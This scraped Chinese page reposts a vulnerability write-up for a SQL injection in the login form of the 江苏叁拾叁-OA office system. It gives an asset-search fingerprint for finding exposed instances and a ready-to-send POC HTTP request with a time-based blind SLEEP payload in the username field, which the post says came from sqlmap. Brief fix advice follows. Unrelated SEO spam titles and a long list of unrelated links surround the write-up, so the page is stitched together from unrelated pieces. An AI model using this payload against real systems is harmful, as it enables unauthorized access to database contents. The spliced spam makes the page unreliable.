当前位置: 首页 > news >正文

信息发布网站推广技巧从化网站建设方案

信息发布网站推广技巧,从化网站建设方案,ps做网站边框,河北建设网站企业锁在哪下载0x01 漏洞介绍 江苏叁拾叁-OA是由江苏叁拾叁信息技术有限公司开发的一款OA办公平台#xff0c;主要有知识管理#xff0c;工作流程#xff0c;沟通交流#xff0c;辅助办公#xff0c;集成解决方案#xff0c;应用支撑平台#xff0c;基础支撑等功能。 该系统也与江苏叁… 0x01 漏洞介绍 江苏叁拾叁-OA是由江苏叁拾叁信息技术有限公司开发的一款OA办公平台主要有知识管理工作流程沟通交流辅助办公集成解决方案应用支撑平台基础支撑等功能。 该系统也与江苏叁拾叁智慧农业研究院的农产品电商解决方案、社会化服务解决方案、乡村振兴解决方案等进行了深度融合。该漏洞存在于login下username对接受的传参没有进行严格的过滤从而导致SQL注入攻击者可以利用该漏洞获取数据库敏感信息。 0x02 影响版本 江苏叁拾叁-OA 0x03 语法特征 app江苏叁拾叁-OA 0x04 漏洞复现 页面   POC(payload sqlmap梭哈来的) POST /login HTTP/1.1 Host: Content-Length: 93 Cache-Control: max-age0 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q0.9 Connection: closeusernameadmin AND (SELECT 9415 FROM (SELECT(SLEEP(4)))QBMI) AND AUxOAUxOamp;passwordadmin 直接sqlmap梭哈来   0x05 漏洞修复建议 使用参数化查询对用户输入进行验证和过滤限制数据库账户权限更新和打补丁
http://www.ho-use.cn/article/10824197.html

相关文章:

  • 做一个大型网站番禺人才网官网
  • 电子商务网站建设的作用wordpress留言板代码
  • 网站收缩栏杭州定制网站制作
  • 空间放两个网站vi设计公司简介
  • 百色市右江区了建设局网站麦云短链接
  • 网站建设的总结100字运城哪里做网站
  • 电子商务专业网站设计wordpress登录开发文档
  • 网站主机的类型中国建筑股份有限公司
  • 即墨专业医院网站制作公司wordpress 封禁账号
  • 仿站工具教程昆明网站建设是什么意思
  • 新型h5网站建设贵阳网站开发推荐
  • 凡科网站内容怎么做效果好河北seo
  • 男孩子怎么做网站推广北京网站制作设计与开发服务
  • 一级a做爰片拍网站大庆网站建设公司
  • 济南正宗网站建设报价wordpress网盘搜索引擎插件
  • 阜阳网站制作公司报价什么网站可以发布广告
  • 网站建设内存可以自己企业网站制作
  • 网站模板中文乱码做论坛网站如何赚钱的
  • 如果一个网站没有备案建设管理网站首页
  • 自己怎么做彩票网站吗网站建设流费用
  • 网站短信验证码接口怎么做wordpress上传到服务器发布
  • 电子商务网站建设实训个人总结苏州注册公司网上申请入口
  • 网站怎么加ico中国嘉兴门户网站
  • 营销型网站建设的五力原则新网站如何被快速收录
  • 察隅网站建设谷德设计网站官网入口
  • 获取访问网站的qq数据库营销
  • 广安做网站公司做网站需要什么技术
  • 金昌市建设局网站湖南营销型网站建设 搜搜磐石网络
  • 网站搜索查询wordpress固定连接改成什么好
  • 秦皇岛网站设计制作外贸公司代理注册